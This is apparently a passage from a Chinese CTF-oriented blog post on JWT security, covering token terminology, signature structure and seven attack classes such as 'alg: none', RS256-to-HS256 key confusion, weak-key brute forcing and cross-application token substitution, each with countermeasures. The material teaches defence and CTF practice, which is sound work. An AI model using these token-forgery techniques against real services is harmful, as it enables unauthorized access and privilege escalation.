<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221207144053858.png" alt="image-20221207144053858"></p>
<p>或者自己进行 base64 编码然后拼接，注入拼接时去掉 base64 的 =</p>
<p>登录后即可 getflag</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2dyYjgxOS9hcnRpY2xlL2RldGFpbHMvMTE3ODg2NTcw">(72 条消息) CTFHUB-2020 - 虎符 - Web-easy_login-Node.js - 前端 JWT_(∪.∪ )…zzz 的博客 - CSDN 博客</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuamlhbnNodS5jb20vcC8wZjc2ZTFjNjllMzM=">2020 - 虎符网络安全赛道 - Web-easy_login - 简书 (jianshu.com)</span></p>
<h3 id="jwt名词解释"><a class="markdownIt-Anchor" href="#jwt名词解释">#</a> jwt 名词解释</h3>
<blockquote>
<p>1.JWS：Signed JWT 签名过的 jwt</p>
<p>2.JWE：Encrypted JWT 部分 payload 经过加密的 jwt；</p>
<p>目前加密 payload 的操作不是很普及；</p>
<p>3.JWK：JWT 的密钥，也就是我们常说的 scret；</p>
<p>4.JWKset：JWT key set 在非对称加密中，需要的是密钥对而非单独的密钥，在后文中会阐释；</p>
<p>5.JWA：当前 JWT 所用到的密码学算法；</p>
<p>6.nonsecure JWT：当头部的签名算法被设定为 none 的时候，该 JWT 是不安全的；因为签名的部分空缺，所有人都可以修改。</p>
</blockquote>
<h3 id="jws-的结构"><a class="markdownIt-Anchor" href="#jws-的结构">#</a> JWS 的结构</h3>
<p>JWS ，也就是 JWT Signature，其结构就是在之前 nonsecure JWT 的基础上，在头部声明签名算法，并在最后添加上签名。创建签名，是保证 jwt 不能被他人随意篡改。</p>
<p>为了完成签名，除了用到 header 信息和 payload 信息外，还需要算法的密钥，也就是 secret。当利用非对称加密方法的时候，这里的 secret 为私钥。</p>
<p>为了方便后文的展开，我们把 JWT 的密钥或者密钥对，统一称为 JSON Web Key，也就是 JWK。</p>
<p>到目前为止，jwt 的签名算法有三种。</p>
<p>对称加密 HMAC【哈希消息验证码】：HS256/HS384/HS512</p>
<p>非对称加密 RSASSA【RSA 签名算法】（RS256/RS384/RS512）和 ECDSA【椭圆曲线数据签名算法】（ES256/ES384/ES512）</p>
<p>最后将签名与之前的两段内容用。连接，就可以得到经过签名的 JWT，也就是 JWS。</p>
<p>当验证签名的时候，利用公钥或者密钥来解密 Sign，和 base64UrlEncode (header) + “.” + base64UrlEncode (payload) 的内容完全一样的时候，表示验证通过。</p>
<h3 id="jwt-攻击手段"><a class="markdownIt-Anchor" href="#jwt-攻击手段">#</a> JWT 攻击手段</h3>
<p>JWT 的攻击手段包括以下内容：</p>
<p>参考网站：<span class="exturl" data-url="aHR0cHM6Ly9hdXRoMC5jb20vYmxvZy9jcml0aWNhbC12dWxuZXJhYmlsaXRpZXMtaW4tanNvbi13ZWItdG9rZW4tbGlicmFyaWVzLy8lRTMlODAlODI=">https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//。</span></p>
<h4 id="1-敏感信息泄露"><a class="markdownIt-Anchor" href="#1-敏感信息泄露">#</a> 1. 敏感信息泄露</h4>
<p>当服务端的秘钥泄密的时候，JWT 的伪造就变得非常简单容易。对此，服务端应该妥善保管好私钥，以免被他人窃取。</p>
<h4 id="2-将加密方式改为none"><a class="markdownIt-Anchor" href="#2-将加密方式改为none">#</a> 2. 将加密方式改为’none’</h4>
<p>下文实战中的 Juice Shop JWT issue 1 便是这个问题。之前谈及过 nonsecure JWT 的问题。</p>
<p>签名算法确保恶意用户在传输过程中不会修改 JWT。但是标题中的 alg 字段可以更改为 none。一些 JWT 库支持无算法，即没有签名算法。当 alg 为 none 时，后端将不执行签名验证。将 alg 更改为 none 后，从 JWT 中删除签名数据（仅标题 +’.’+ payload +’.’）并将其提交给服务器。</p>
<p><strong>解决对策：</strong></p>
<blockquote>
<p>不允许出现 none 的方法；</p>
<p>将开启 alg : none 作为一种额外的配置选项。</p>
</blockquote>
<h4 id="3将算法rs256修改为hs256非对称密码算法对称密码算法"><a class="markdownIt-Anchor" href="#3将算法rs256修改为hs256非对称密码算法对称密码算法">#</a> 3. 将算法 RS256 修改为 HS256（非对称密码算法 =&gt; 对称密码算法）</h4>
<p>HS256 使用密钥来签名和验证每个消息。而 RS256 使用私钥对消息进行签名并使用公钥进行认证。</p>
<p>如果将算法从 RS256 更改为 HS256，则后端代码使用公钥作为密钥，然后使用 HS256 算法验证签名。由于攻击者有时可以获取公钥，因此攻击者可以将标头中的算法修改为 HS256，然后使用 RSA 公钥对数据进行签名。</p>
<p>此时，后端代码就会使用 RSA 公钥 + HS256 算法进行签名验证，从而让验证通过。</p>
<p><strong>解决对策：</strong></p>
<blockquote>
<p>不允许 HS256 等对称加密 算法读取秘钥。jwtpy 就是限制了这种方法。当读取到 类似于 “— xxx key —” 的参数的时候应抛出错误；</p>
<p>将秘钥与验证算法相互匹配。</p>
</blockquote>
<h4 id="4-hs256对称加密密钥破解"><a class="markdownIt-Anchor" href="#4-hs256对称加密密钥破解">#</a> 4. HS256（对称加密）密钥破解</h4>
<p>如果 HS256 密钥强度较弱，则可以直接强制使用，通过爆破 HS256 的秘钥可以完成该操作。难度比较低。解决对策很简单，使用复杂的秘钥即可。</p>
<h4 id="5-错误的堆叠加密签名验证假设"><a class="markdownIt-Anchor" href="#5-错误的堆叠加密签名验证假设">#</a> 5. 错误的堆叠加密 + 签名验证假设</h4>
<p><strong>错误的堆叠加密</strong></p>
<p>这种攻击发生在单个的或者嵌套的 JWE 中，我们想象一个 JWE 如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">JWT RAW</span><br><span class="line"></span><br><span class="line">    header : ...</span><br><span class="line"></span><br><span class="line">    payload: &quot;admin&quot; : false</span><br><span class="line"></span><br><span class="line">             &quot;uid&quot;   : 123</span><br><span class="line"></span><br><span class="line">             &quot;umail&quot; : 123@126.com</span><br><span class="line"></span><br><span class="line">             ...</span><br><span class="line"></span><br><span class="line">JWE Main</span><br><span class="line"></span><br><span class="line">    protected / unprotected</span><br><span class="line"></span><br><span class="line">    recipients:</span><br><span class="line"></span><br><span class="line">        en_key : key1</span><br><span class="line"></span><br><span class="line">        en_key : key2</span><br><span class="line"></span><br><span class="line">    cipher : xxx</span><br></pre></td></tr></table></figure>
<p>在攻击者不修改秘钥的情况下，对于 ciphertext 进行修改。往往会导致解密的失败。但是，即使是失败，很多 JWT 的解密也是会有输出的，在没有附加认证数据（ADD）的情况下更是如此。攻击者对于 ciphertext 的内容进行修改，可能会让其他的数据无法解密，但是只要最后输出的 payload 中，有 “admin&quot;:true。 其目的就已经达到了。</p>
<p><strong>解决对策：</strong></p>
<blockquote>
<p>对于 JWE 而言，应当解密所有数据，而非从解密的结果中提取单个需要的数据。另外，利用附加认证数据 ADD，也是非常好的选择。</p>
</blockquote>
<p><strong>签名假设验证</strong></p>
<p>这种攻击发生嵌套的 JWS 中。我们想象一个嵌套的 JWS, 其包括了两层的部分，其结构如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">JWT Main</span><br><span class="line"></span><br><span class="line">    JWT Sub1</span><br><span class="line"></span><br><span class="line">        payload</span><br><span class="line"></span><br><span class="line">        Signature2</span><br><span class="line"></span><br><span class="line">    Signature</span><br></pre></td></tr></table></figure>
<p>现在，攻击者通过一定的方式，能够让外层的验证通过的时候，此时，系统还应该检查内层的签名数据，如果不检查，攻击者就可以随意篡改 payload 的数据，来达到越权的目的。</p>
<p><strong>解决对策：</strong></p>
<blockquote>
<p>因此对于嵌套 JWS 而言，应当验证所有层面的签名是否正确，而非验证最外层的签名是否正确就足够。</p>
</blockquote>
<h4 id="6-无效椭圆曲线攻击"><a class="markdownIt-Anchor" href="#6-无效椭圆曲线攻击">#</a> 6. 无效椭圆曲线攻击</h4>
<p>椭圆曲线加密是一种非常安全的方式，甚至从某种程度上而言，比 RSA 更加安全。关于椭圆曲线的算法，在此不展开。</p>
<p>在椭圆曲线加密中，公钥是椭圆曲线上的一个点，而私钥只是一个位于特殊但非常大的范围内的数字。 如果未验证对这些操作的输入，那攻击者就可以进行设计，从而恢复私钥。</p>
<p>而这种攻击已在过去中得到证实。这类攻击被称为无效曲线攻击。这种攻击比较复杂，也设计到很多的数学知识。详细可以参考文档：<span class="exturl" data-url="aHR0cDovL2Jsb2dzLmFkb2JlLmNvbS9zZWN1cml0eS8yMDE3LzAzL2NyaXRpY2FsLXZ1bG5lcmFiaWxpdHktdW5jb3ZlcmVkLWluLWpzb24tZW5jcnlwdGlvbi5odG1s">critical-vulnerability-uncovered-in-json-encryption</span>。</p>
<p><strong>解决对策：</strong></p>
<blockquote>
<p>检查传递给任何公共函数的所有输入是否有效是解决这类攻击的关键点。验证内容包括公钥是所选曲线的有效椭圆曲线点，以及私钥位于有效值范围内。</p>
</blockquote>
<h4 id="7-替换攻击"><a class="markdownIt-Anchor" href="#7-替换攻击">#</a> 7. 替换攻击</h4>
<p>在这种攻击中，攻击者需要至少获得两种不同的 JWT，然后攻击者可以将令牌中的一个或者两个用在其他的地方。</p>
<p>在 JWT 中，替换共叽有两种方式，我们称他们为相同接收方攻击（跨越式 JWT）和不同接收方攻击。</p>
<p><strong>不同接收方攻击</strong></p>
<p>我们可以设想一个业务逻辑如下：</p>
<blockquote>
<p>Auth 机构，有着自己的私钥，并且给 App1 和 App2 发放了两个公钥，用于验证签名；</p>
<p>Attacker 利用自己的秘钥登录了 App1。</p>
</blockquote>
<p>此时 Auth 机构给 Attacker 下发了一个 附带签名的 JWT，其 payload 内容为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    &#x27;uname&#x27;:&#x27;Attacker&#x27;</span><br><span class="line"></span><br><span class="line">    &#x27;role&#x27; :&#x27;admin&#x27;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>此时，如果 Attacker 知道 App1 和 App2 的公钥是同一个 Auth 签发的话，他可以利用这个 JWT 去登录 App2，从而获取 Admin 权限。</p>
<p><strong>解决方法：</strong></p>
<blockquote>
<p>在 jwt 中带上 aud 声明，比如 aud : App1 这样。来限定该 jwt 只能用于 App1。</p>
</blockquote>
<p><strong>相同接收方攻击 / 跨越式 JWT same recipient/Cross JWT</strong></p>
<p>我们可以设想一个业务逻辑如下：</p>
<blockquote>
<p>在同一站点下，有两个应用程序，wordpress 和 phpmyadmin，他们都利用了相同的秘钥对和算法来验证 JWT 签名；</p>
<p>站点管理员知道 Different Recipient 的问题，所以给 wordpress 的应用增加了 aud 验证，但是 phpmyadmin 的用户人数较少，没有增加 aud 的验证；</p>
<p>Attacker 利用自己的秘钥登录了 wordpress。</p>
</blockquote>
<p>此时 站点 给 Attacker 下发了一个 附带签名的 JWT，其 payload 内容为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    &#x27;uname&#x27;:&#x27;Attacker&#x27;</span><br><span class="line"></span><br><span class="line">    &#x27;role&#x27; :&#x27;writer&#x27;</span><br><span class="line"></span><br><span class="line">    &#x27;aud&#x27; :&#x27;shaobaobaoer.cn/wordpress&#x27;</span><br><span class="line"></span><br><span class="line">    &#x27;iss&#x27; :&#x27;shaobaobaoer.cn&#x27;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个 JWT 看似非常安全，但这仅仅是对于 wordpress 的应用程序而言，。从而 Attacker 可以以 writer 的身份登录 phpmyadmin。</p>
<h3 id="例题"><a class="markdownIt-Anchor" href="#例题">#</a> 例题</h3>
<p>ctfshow 345-350</p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cucnVub29iLmNvbS9qc3JlZi9wcm9wLXdpbi1sb2NhbHN0b3JhZ2UuaHRtbA==">Window localStorage 属性 | 菜鸟教程 (runoob.com)</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9qYXZhZ3VpZGUuY24vc3lzdGVtLWRlc2lnbi9zZWN1cml0eS9qd3QtaW50cm8uaHRtbCMlRTUlQTYlODIlRTQlQkQlOTUlRTklOTglQjIlRTYlQUQlQTItand0LSVFOCVBMiVBQiVFNyVBRiVBMSVFNiU5NCVCOQ==">JWT 基础概念详解 (javaguide.cn)</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9qd3QuaW8v">JSON Web Tokens - jwt.io</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZWJ1Zi5jb20vYXJ0aWNsZXMvd2ViLzE4MDg3NC5odG1s">https://www.freebuf.com/articles/web/180874.html</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZWJ1Zi5jb20vYXJ0aWNsZXMvd2ViLzE4MTI2MS5odG1s">https://www.freebuf.com/articles/web/181261.html</span></p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2022-12-19 18:17:00" itemprop="dateModified" datetime="2022-12-19T18:17:00+08:00">2022-12-19</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="John Doe Alipay">
        <p>Alipay</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="John Doe PayPal">
        <p>PayPal</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://example.com/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/" title="JWT">http://example.com/2022/11/17/JWT 基础/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/11/11/reverse/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;img.timelessq.com&#x2F;images&#x2F;2022&#x2F;07&#x2F;26&#x2F;b4993dcc18b931060093920da621db79.jpg" title="逆向">
  <span class="type">Previous Post</span>
  <span class="category"><i class="ic i-flag"></i> 逆向</span>
  <h3>逆向</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/11/27/Docker%E9%80%83%E9%80%B8/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;img.timelessq.com&#x2F;images&#x2F;2022&#x2F;07&#x2F;26&#x2F;84ffd76b69056962d5e97a5fa075a9f4.jpg" title="docker逃逸&amp;capabilities">
  <span class="type">Next Post</span>
  <span class="category"><i class="ic i-flag"></i> web安全</span>
  <h3>docker逃逸&capabilities</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="Contents">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#jwt-%E5%9F%BA%E7%A1%80"><span class="toc-number">1.</span> <span class="toc-text"> JWT 基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#localstorage%E4%B8%8Ecookie"><span class="toc-number">1.1.</span> <span class="toc-text"> localstorage 与 cookie</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jwt%E7%BB%84%E6%88%90"><span class="toc-number">1.2.</span> <span class="toc-text"> JWT 组成</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#header"><span class="toc-number">1.2.1.</span> <span class="toc-text"> header</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#payload"><span class="toc-number">1.2.2.</span> <span class="toc-text"> Payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#signature"><span class="toc-number">1.2.3.</span> <span class="toc-text"> Signature</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jwt%E8%BF%9B%E8%A1%8C%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81"><span class="toc-number">1.3.</span> <span class="toc-text"> JWT 进行身份验证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E6%AD%A2-jwt-%E8%A2%AB%E7%AF%A1%E6%94%B9"><span class="toc-number">1.4.</span> <span class="toc-text"> 防止 JWT 被篡改</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%8A%A0%E5%BC%BA-jwt-%E7%9A%84%E5%AE%89%E5%85%A8%E6%80%A7"><span class="toc-number">1.5.</span> <span class="toc-text"> 如何加强 JWT 的安全性？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jwt%E4%BC%98%E5%8A%BF"><span class="toc-number">1.6.</span> <span class="toc-text"> jwt 优势</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E7%8A%B6%E6%80%81"><span class="toc-number">1.6.1.</span> <span class="toc-text"> 无状态</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%89%E6%95%88%E9%81%BF%E5%85%8D%E4%BA%86-csrf-%E6%94%BB%E5%87%BB"><span class="toc-number">1.6.2.</span> <span class="toc-text"> 有效避免了 CSRF 攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%82%E5%90%88%E7%A7%BB%E5%8A%A8%E7%AB%AF%E5%BA%94%E7%94%A8"><span class="toc-number">1.6.3.</span> <span class="toc-text"> 适合移动端应用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%95%E7%82%B9%E7%99%BB%E5%BD%95%E5%8F%8B%E5%A5%BD"><span class="toc-number">1.6.4.</span> <span class="toc-text"> 单点登录友好</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jwt%E5%9C%A8ctf%E4%B8%AD%E8%BF%90%E7%94%A8"><span class="toc-number">1.7.</span> <span class="toc-text"> jwt 在 ctf 中运用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ciscn2019-%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA-day1-web2ikun"><span class="toc-number">1.7.1.</span> <span class="toc-text"> [CISCN2019 华北赛区 Day1 Web2] ikun</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hfctf2020easylogin"><span class="toc-number">1.7.2.</span> <span class="toc-text"> [HFCTF2020]EasyLogin</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jwt%E5%90%8D%E8%AF%8D%E8%A7%A3%E9%87%8A"><span class="toc-number">1.7.3.</span> <span class="toc-text"> jwt 名词解释</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jws-%E7%9A%84%E7%BB%93%E6%9E%84"><span class="toc-number">1.7.4.</span> <span class="toc-text"> JWS 的结构</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jwt-%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5"><span class="toc-number">1.7.5.</span> <span class="toc-text"> JWT 攻击手段</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">1.7.5.1.</span> <span class="toc-text"> 1. 敏感信息泄露</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E5%B0%86%E5%8A%A0%E5%AF%86%E6%96%B9%E5%BC%8F%E6%94%B9%E4%B8%BAnone"><span class="toc-number">1.7.5.2.</span> <span class="toc-text"> 2. 将加密方式改为’none’</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3%E5%B0%86%E7%AE%97%E6%B3%95rs256%E4%BF%AE%E6%94%B9%E4%B8%BAhs256%E9%9D%9E%E5%AF%B9%E7%A7%B0%E5%AF%86%E7%A0%81%E7%AE%97%E6%B3%95%E5%AF%B9%E7%A7%B0%E5%AF%86%E7%A0%81%E7%AE%97%E6%B3%95"><span class="toc-number">1.7.5.3.</span> <span class="toc-text"> 3. 将算法 RS256 修改为 HS256（非对称密码算法 &#x3D;&gt; 对称密码算法）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-hs256%E5%AF%B9%E7%A7%B0%E5%8A%A0%E5%AF%86%E5%AF%86%E9%92%A5%E7%A0%B4%E8%A7%A3"><span class="toc-number">1.7.5.4.</span> <span class="toc-text"> 4. HS256（对称加密）密钥破解</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-%E9%94%99%E8%AF%AF%E7%9A%84%E5%A0%86%E5%8F%A0%E5%8A%A0%E5%AF%86%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%81%87%E8%AE%BE"><span class="toc-number">1.7.5.5.</span> <span class="toc-text"> 5. 错误的堆叠加密 + 签名验证假设</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-%E6%97%A0%E6%95%88%E6%A4%AD%E5%9C%86%E6%9B%B2%E7%BA%BF%E6%94%BB%E5%87%BB"><span class="toc-number">1.7.5.6.</span> <span class="toc-text"> 6. 无效椭圆曲线攻击</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#7-%E6%9B%BF%E6%8D%A2%E6%94%BB%E5%87%BB"><span class="toc-number">1.7.5.7.</span> <span class="toc-text"> 7. 替换攻击</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-number">1.7.6.</span> <span class="toc-text"> 例题</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="Related">
        <ul>
          <li><a href="/2022/03/16/SQL%E6%B3%A8%E5%85%A5/" rel="bookmark" title="SQL injection">SQL injection</a></li><li><a href="/2022/04/16/Upload/" rel="bookmark" title="File upload">File upload</a></li><li><a href="/2022/05/17/include/" rel="bookmark" title="file include">file include</a></li><li><a href="/2022/05/27/CSRF/" rel="bookmark" title="CSRF">CSRF</a></li><li><a href="/2022/06/27/SSRF/" rel="bookmark" title="SSRF">SSRF</a></li><li><a href="/2022/08/16/Unserialize/" rel="bookmark" title="unserialize">unserialize</a></li><li class="active"><a href="/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/" rel="bookmark" title="JWT">JWT</a></li><li><a href="/2022/11/27/CDN/" rel="bookmark" title="CDN&DNS">CDN&DNS</a></li><li><a href="/2022/11/27/Docker%E9%80%83%E9%80%B8/" rel="bookmark" title="docker逃逸&capabilities">docker逃逸&capabilities</a></li><li><a href="/2022/12/27/SSTI/" rel="bookmark" title="SSTI">SSTI</a></li><li><a href="/2022/12/31/webshell/" rel="bookmark" title="webshell">webshell</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="Overview">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="John Doe"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">John Doe</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">40</span>
        <span class="name">posts</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">4</span>
        <span class="name">categories</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">4</span>
        <span class="name">tags</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>Home</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/11/11/reverse/" rel="prev" title="Previous Post"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/11/27/Docker%E9%80%83%E9%80%B8/" rel="next" title="Next Post"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>Random Posts</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E9%80%86%E5%90%91/" title="In 逆向">逆向</a>
</div>

    <span><a href="/2023/01/03/%E6%BB%B4%E6%B0%B4reverse/" title="水滴rev">水滴rev</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/08/16/Unserialize/" title="unserialize">unserialize</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E9%80%86%E5%90%91/" title="In 逆向">逆向</a>
</div>

    <span><a href="/2023/08/15/%E7%A0%B4%E8%A7%A3%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E4%B9%8B%E8%AE%A4%E8%AF%86%E5%A3%B3%E4%B8%8E%E7%A8%8B%E5%BA%8F%E7%9A%84%E7%89%B9%E5%BE%81/" title="破解基础知识之认识壳与程序的特征">破解基础知识之认识壳与程序的特征</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/03/27/http/" title="http">http</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/07/TCPIP_new/" title="TCP&#x2F;IP">TCP/IP</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/03/iptables2/" title="iptables">iptables</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/05/17/include/" title="file include">file include</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web%E5%AE%89%E5%85%A8/" title="In web安全">web安全</a>
</div>

    <span><a href="/2022/11/27/CDN/" title="CDN&amp;DNS">CDN&DNS</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/12/28/mysql/" title="Mysql">Mysql</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/02/k8s%E9%AB%98%E7%BA%A7/" title="k8s高级">k8s高级</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>Recent Comments</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">John Doe @ Yume Shoka</span>
  </div>
  <div class="powered-by">
    Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/11/17/JWT 基础/',
    favicon: {
      show: "（●´3｀●）Goooood",
      hide: "(´Д｀)Booooom"
    },
    search : {
      placeholder: "Search for Posts",
      empty: "We didn't find any results for the search: ${query}",
      stats: "${hits} results found in ${time} ms"
    },
    valine: true,fancybox: true,
    copyright: 'Copied to clipboard successfully! <br> All articles in this blog are licensed under <i class="ic i-creative-commons"></i>BY-NC-SA.',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

